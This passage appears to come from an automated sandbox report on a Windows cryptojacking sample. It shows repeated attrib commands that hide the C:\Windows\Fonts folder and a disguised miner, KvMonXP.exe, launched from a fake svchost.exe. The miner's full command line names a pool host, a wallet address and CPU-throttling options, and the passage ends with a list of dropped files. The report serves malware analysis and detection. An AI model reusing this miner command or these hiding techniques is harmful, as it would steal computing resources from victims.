                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                              PID:4148
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:408
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                PID:884
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1668
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3724
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:2396
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3280
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
          PID:3232
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:4004
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
          PID:452
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:2896
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
          PID:2568
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:1316
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
        • Views/modifies file attributes
        PID:872
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:1712
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
        • Drops file in Windows directory
        PID:3960
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:4820
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
          PID:3996
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:1140
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
        • Views/modifies file attributes
        PID:4588
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:1984
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
        • Views/modifies file attributes
        PID:3904
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:3492
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
        • Drops file in Windows directory
        PID:628
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:5040
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +a C:\Windows\Fonts
        4⤵
          PID:1628
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
        PID:668
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1508
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3788
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3636
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4132
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1204
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3784
                                                                                                                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\Fonts\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          c:\windows\Fonts\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2544
                                                                                                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\Fonts\KvMonXP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1760

                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tem.vbs

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          257B

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Fonts\KvMonXP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Fonts\conhost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          4.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Fonts\svchost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          292KB

                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1760-35-0x000001D714D30000-0x000001D714D40000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          5.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          5.8MB